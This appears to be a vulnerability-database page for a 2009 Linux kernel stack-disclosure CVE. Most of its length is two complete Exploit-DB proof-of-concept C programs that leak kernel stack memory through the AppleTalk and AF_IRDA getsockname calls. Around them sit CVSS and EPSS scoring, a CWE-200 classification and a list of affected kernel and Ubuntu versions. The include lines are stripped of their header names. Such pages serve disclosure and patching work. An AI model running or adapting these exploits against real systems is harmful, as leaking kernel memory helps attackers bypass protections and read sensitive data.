Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-200 |
Exposure of Sensitive Information to an Unauthorized Actor The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
|
Metrics
Metric |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.9 |
|
AV:L/AC:L/Au:N/C:C/I:N/A:N |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 9521
Publication date : 2009-08-25 22:00 +00:00
Author : Clément Lecigne
EDB Verified : Yes
/**
* appleak.c
*
* Linux keunouille <= 2.6.30
*
* AppleTalk getsockname() 8-bytes kernel stack disclosure
*
* http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=3d392475c873c10c10d6d96b94d092a34ebd4791
*
* atalk_getname() can leak 8 bytes of kernel memory to user
*
* [clem1@noe ~]$ ./appleak
* 1e 83 f2 31 ec 56 d7 f6 | ...1.V..
* 00 f4 55 f6 84 2a ca bf | ..U..*..
* 00 f4 55 f6 1e 83 f2 31 | ..U....1
* 1e 83 f2 31 00 60 5e f6 | ...1.`^.
* 00 f4 55 f6 84 2a ca bf | ..U..*..
* c0 2a 54 c0 a8 61 45 f6 | .*T..aE.
* 21 54 12 c0 84 2a ca bf | !T...*..
* (...)
*
* (c) Clément LECIGNE
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
void kernop(int fd)
{
/* from Jon Oberheide sploit
*/
const int randcalls[] = {
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
__NR_sched_getparam, __NR_sched_get_priority_max
};
const int randsopts[] = { SOL_SOCKET, AF_APPLETALK };
int ret, len;
char buf[1024];
do
{
switch ( rand() % 3 )
{
case 0:
ret = syscall(randcalls[rand() % sizeof(randcalls)/sizeof(randcalls[0])]);
break;
case 1:
len = (rand() % 2) ? sizeof(int) : sizeof(buf);
ret = getsockopt(fd, randsopts[rand() % sizeof(randsopts)/sizeof(randsopts[0])], rand() % 130, &buf, &len);
break;
case 2:
len = (rand() % 2) ? sizeof(int) : sizeof(buf);
ret = setsockopt(fd, randsopts[rand() % sizeof(randsopts)/sizeof(randsopts[0])], rand() % 130, &buf, len);
break;
}
}
while ( ret < 0 );
}
void dump( unsigned char * data, unsigned int len )
{
unsigned int dp, p;
const char trans[] =
"................................ !\"#$%&'()*+,-./0123456789"
":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
"nopqrstuvwxyz{|}~...................................."
"....................................................."
"........................................";
for ( dp = 1; dp <= len; dp++ )
{
printf("%02x ", data[dp-1]);
if ( (dp % 8) == 0 )
{
printf("| ");
p = dp;
for ( dp -= 8; dp < p; dp++ ) {
printf("%c", trans[data[dp]]);
}
printf("\n");
}
}
return;
}
int main(void)
{
struct sockaddr_at sat;
int s, len = sizeof(sat), occ = 500;
char prev_zero[sizeof(sat.sat_zero)] = { 0 };
s = socket(AF_APPLETALK, SOCK_DGRAM, 0);
if ( s == -1 )
{
perror("socket");
return EXIT_FAILURE;
}
memset(&sat, 0, sizeof(sat));
sat.sat_family = AF_APPLETALK;
sat.sat_addr.s_net = htons(ATADDR_ANYNET);
sat.sat_addr.s_node = ATADDR_ANYNODE;
sat.sat_port = ATADDR_ANYPORT;
if ( bind(s, (struct sockaddr *) &sat, len) < 0 )
{
perror("bind");
return EXIT_FAILURE;
}
srand(time(NULL) ^ getpid());
while ( --occ )
{
kernop(s);
if ( getsockname(s, (struct sockaddr *) &sat, &len) == 0 )
{
if ( memcmp(sat.sat_zero, prev_zero, sizeof(sat.sat_zero)) != 0 )
{
dump((unsigned char *) &sat.sat_zero, sizeof(sat.sat_zero));
memcpy(&prev_zero, &sat.sat_zero, sizeof(sat.sat_zero));
usleep(5000);
}
}
}
close(s);
return EXIT_SUCCESS;
}
// milw0rm.com [2009-08-26]
Exploit Database EDB-ID : 9543
Publication date : 2009-08-30 22:00 +00:00
Author : Jon Oberheide
EDB Verified : Yes
/*
* cve-2009-3002.c
*
* Linux Kernel < 2.6.31-rc7 AF_IRDA getsockname 29-Byte Stack Disclosure
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3002
*
* The Linux kernel before 2.6.31-rc7 does not initialize certain data
* structures within getname functions, which allows local users to read
* the contents of some kernel memory locations by calling getsockname
* on ... (2) an AF_IRDA socket, related to the irda_getname function in
* net/irda/af_irda.c.
*
* Notes:
*
* Yet another stack disclosure...although this one is big and contiguous.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifndef AF_IRDA
#define AF_IRDA 23
#endif
struct sockaddr_irda {
uint16_t sir_family;
uint8_t sir_lsap_sel;
uint32_t sir_addr;
char sir_name[25];
};
const int randcalls[] = {
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
__NR_sched_getparam, __NR_sched_get_priority_max
};
void
dump(const unsigned char *p, unsigned l)
{
printf("sockaddr_irda:");
while (l > 0) {
printf(" ");
if (l == 33 || l == 28) {
printf("<<< ");
}
printf("%02x", *p);
if (l == 33 || l == 1) {
printf(" >>>");
}
++p; --l;
}
printf("\n");
}
int
main(void)
{
struct sockaddr_irda saddr;
int ret, call, sock, len = sizeof(saddr);
printf("[+] Creating AF_IRDA socket.\n");
sock = socket(AF_IRDA, SOCK_DGRAM, 0);
if (sock == -1) {
printf("[-] Error: Couldn't create AF_IRDA socket.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}
memset(&saddr, 0, len);
printf("[+] Ready to call getsockname.\n\n");
for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));
while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);
ret = getsockname(sock, (struct sockaddr *) &saddr, &len);
if (ret != 0) {
printf("[-] Error: getsockname failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}
dump((unsigned char *) &saddr, sizeof(saddr));
}
return 0;
}
// milw0rm.com [2009-08-31]
Products Mentioned
Configuraton 0
Linux>>Linux_kernel >> Version To (excluding) 2.6.31
Linux>>Linux_kernel >> Version 2.6.31
Linux>>Linux_kernel >> Version 2.6.31
Linux>>Linux_kernel >> Version 2.6.31
Linux>>Linux_kernel >> Version 2.6.31
Linux>>Linux_kernel >> Version 2.6.31
Linux>>Linux_kernel >> Version 2.6.31
Linux>>Linux_kernel >> Version 2.6.31
Configuraton 0
Canonical>>Ubuntu_linux >> Version 6.06
Canonical>>Ubuntu_linux >> Version 8.04
Canonical>>Ubuntu_linux >> Version 8.10
Canonical>>Ubuntu_linux >> Version 9.04
References